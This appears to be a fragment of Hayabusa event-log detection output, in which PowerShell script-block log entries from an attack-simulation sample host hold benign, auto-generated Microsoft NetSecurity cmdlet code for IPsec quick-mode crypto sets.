$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 